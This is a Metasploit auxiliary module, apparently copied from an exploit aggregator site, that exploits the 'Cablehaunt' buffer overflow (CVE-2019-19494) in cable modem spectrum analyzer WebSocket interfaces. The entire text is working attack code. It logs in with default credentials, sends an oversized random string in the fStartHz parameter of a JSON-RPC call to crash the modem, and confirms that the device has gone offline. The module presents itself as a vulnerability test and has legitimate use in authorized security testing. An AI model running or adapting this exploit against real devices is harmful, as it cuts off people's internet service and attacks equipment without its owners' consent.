Share
## https://sploitus.com/exploit?id=PACKETSTORM:180503
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'eventmachine'  
require 'faye/websocket'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',  
'Description' => %q{  
There exists a buffer overflow vulnerability in certain  
Cable Modem Spectrum Analyzer interfaces. This overflow  
is exploitable, but since an exploit would differ between  
every make, model, and firmware version (which also  
differs from ISP to ISP), this module simply causes a  
Denial of Service to test if the vulnerability is present.  
},  
'Author' => [  
'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC  
'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC  
'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC  
'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC  
'Nicholas Starke' # msf module  
],  
'References' => [  
['CVE', '2019-19494'],  
['EDB', '47936'],  
['URL', 'https://cablehaunt.com/'],  
['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']  
],  
'DisclosureDate' => '2020-01-07',  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [CRASH_SERVICE_DOWN],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RHOST('192.168.100.1'),  
Opt::RPORT(8080),  
OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),  
OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),  
OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])  
]  
)  
  
deregister_options('Proxies')  
deregister_options('VHOST')  
deregister_options('SSL')  
end  
  
def run  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => '/',  
'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])  
})  
  
fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?  
fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200  
  
@succeeded = false  
EM.run do  
print_status("Attempting Connection to #{datastore['RHOST']}")  
  
driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])  
  
driver.on :open do  
print_status('Opened connection')  
  
EM::Timer.new(1) do  
print_status('Sending payload')  
payload = Rex::Text.rand_text_alphanumeric(7000..8000)  
driver.send({  
jsonrpc: '2.0',  
method: 'Frontend::GetFrontendSpectrumData',  
params: {  
coreID: 0,  
fStartHz: payload,  
fStopHz: 1000000000,  
fftSize: 1024,  
gain: 1  
},  
id: '0'  
}.to_json)  
rescue StandardError  
fail_with(Failure::Unreachable, 'Could not establish websocket connection')  
end  
end  
  
EM::Timer.new(10) do  
print_status('Checking Modem Status')  
begin  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => '/'  
})  
  
if res.nil?  
@succeeded = true  
print_status('Cable Modem unreachable')  
else  
fail_with(Failure::Unknown, 'Host still reachable')  
end  
rescue StandardError  
@succeeded = true  
print_status('Cable Modem unreachable')  
end  
end  
  
EM::Timer.new(datastore['TIMEOUT']) do  
EventMachine.stop  
if @succeeded  
print_good('Exploit delivered and cable modem unreachable.')  
else  
fail_with(Failure::Unknown, 'Unknown failure occurred')  
end  
end  
end  
end  
end